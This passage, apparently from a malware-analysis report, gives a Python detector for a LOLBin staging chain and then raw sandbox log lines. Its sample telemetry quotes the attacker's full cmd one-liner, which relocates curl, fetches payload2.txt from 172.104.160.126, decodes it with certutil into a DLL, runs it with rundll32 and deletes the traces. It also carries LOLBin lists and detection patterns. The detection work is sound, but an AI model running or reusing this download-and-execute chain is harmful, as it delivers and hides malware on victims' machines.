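LOLBin relocation or download, and a rundll32 load from a user-writable directory.

```python
"""Flag the LOLBin staging chain from this report in process-creation telemetry."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon EID 1 / EDR equivalent), paths as logged."""
    parent_image: str
    image: str
    command_line: str


OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
LOLBINS = ("xcopy", "certutil", "curl", "rundll32", "bitsadmin", "mshta", "regsvr32")
# Directories a standard user can write to; System32 binaries should not run from them.
USER_WRITABLE = re.compile(r"\\(appdata\\local\\temp|users\\public|programdata)\b", re.I)


def basename(path: str) -> str:
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def match_rules(ev: ProcEvent) -> list:
    """Names of every rule a single event trips (empty list for benign events)."""
    cmd, img, hits = ev.command_line.lower(), basename(ev.image), []
    if basename(ev.parent_image) in OFFICE and img in SHELLS:
        hits.append("office_spawns_shell")
    if img == "cmd.exe":
        # Three or more distinct LOLBins chained in one cmd line is rare outside tooling.
        used = {b for b in LOLBINS if re.search(rf'(^|[\s\\"&])({b})(\.exe)?\b', cmd)}
        if len(used) >= 3:
            hits.append("multi_lolbin_oneliner")
    if img == "certutil.exe" and re.search(r"\s-decode(hex)?\b", cmd):
        hits.append("certutil_decode")
    if img in {"xcopy.exe", "cmd.exe", "robocopy.exe"} \
            and re.search(r"\\system32\\(curl|certutil|rundll32)\.exe", cmd) \
            and USER_WRITABLE.search(cmd):
        hits.append("lolbin_copied_to_user_dir")
    if img == "curl.exe" and USER_WRITABLE.search(ev.image) \
            and re.search(r"https?://", cmd) and re.search(r"\s(-o|--output)\s", cmd):
        hits.append("relocated_curl_download")
    if img == "rundll32.exe" and USER_WRITABLE.search(cmd) and re.search(r"\.dll,\s*\w+", cmd):
        hits.append("rundll32_dll_from_user_dir")
    return hits


def analyze(events) -> dict:
    """Per-event hits plus a chain verdict: decode + (relocate or download) + rundll32 from user dir."""
    per_event = [(ev.command_line, match_rules(ev)) for ev in events]
    seen = {rule for _, rules in per_event for rule in rules}
    chain = {"certutil_decode", "rundll32_dll_from_user_dir"} <= seen \
        and bool({"relocated_curl_download", "lolbin_copied_to_user_dir"} & seen)
    return {"hits": per_event, "rules_seen": seen, "staging_chain": chain}


# Constructed telemetry built from the command lines in this report. The WINWORD
# parent of the first cmd.exe is assumed; the last record is a benign control.
T = r"C:\Users\user\AppData\Local\Temp"
S32 = r"C:\Windows\System32"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE", rf"{S32}\cmd.exe",
              rf'"{S32}\cmd.exe" /c xcopy {S32}\curl.exe {T} & certutil -f -encode {T}\curl.exe {T}\curl.txt '
              rf'& certutil -f -decode {T}\curl.txt {T}\curl.exe & {T}\curl.exe http://172.104.160.126:8099/payload2.txt '
              rf'-o {T}\mscorsvc.txt & certutil -f -decode {T}\mscorsvc.txt {T}\mscorsvc.dll & del {T}\curl.exe '
              rf'& del {T}\curl.txt & del {T}\curl.exe & del {T}\mscorsvc.txt & start " " rundll32 {T}\mscorsvc.dll,DllMain & exit'),
    ProcEvent(rf"{S32}\cmd.exe", rf"{S32}\xcopy.exe", rf"xcopy {S32}\curl.exe {T}"),
    ProcEvent(rf"{S32}\cmd.exe", rf"{S32}\certutil.exe", rf"certutil -f -encode {T}\curl.exe {T}\curl.txt"),
    ProcEvent(rf"{S32}\cmd.exe", rf"{S32}\certutil.exe", rf"certutil -f -decode {T}\curl.txt {T}\curl.exe"),
    ProcEvent(rf"{S32}\cmd.exe", rf"{T}\curl.exe",
              rf"{T}\curl.exe http://172.104.160.126:8099/payload2.txt -o {T}\mscorsvc.txt"),
    ProcEvent(rf"{S32}\cmd.exe", rf"{S32}\certutil.exe", rf"certutil -f -decode {T}\mscorsvc.txt {T}\mscorsvc.dll"),
    ProcEvent(rf"{S32}\cmd.exe", rf"{S32}\rundll32.exe", rf"rundll32 {T}\mscorsvc.dll,DllMain"),
    ProcEvent(r"C:\Windows\explorer.exe", rf"{S32}\certutil.exe",
              r"certutil -hashfile C:\Users\user\Downloads\setup.msi SHA256"),
]

if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    for cmdline, rules in result["hits"]:
        if rules:
            print(f"{', '.join(rules):<45} {cmdline[:90]}")
    print("staging chain:", result["staging_chain"])
```

The per-event rules are the ones the report's own Sigma hits correspond to (Office child process, certutil decode, rundll32 from Temp); the `analyze` verdict is what makes them actionable, because a lone `certutil -decode` or a lone `curl -o` is common in admin scripting, while decode plus relocation plus a rundll32 load from the same user-writable directory within one session is not. The `-encode` step and the benign `-hashfile` record trip nothing, which is the precision you want before wiring such logic to an alert.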
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F4DBAFC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 7_2_000000013F4DBAFC
Source: C:\Windows\System32\certutil.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F4A2B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError, 7_2_000000013F4A2B14
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F4CF964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket, 7_2_000000013F4CF964
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F322B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError, 22_2_000000013F322B14
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F34F964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket, 22_2_000000013F34F964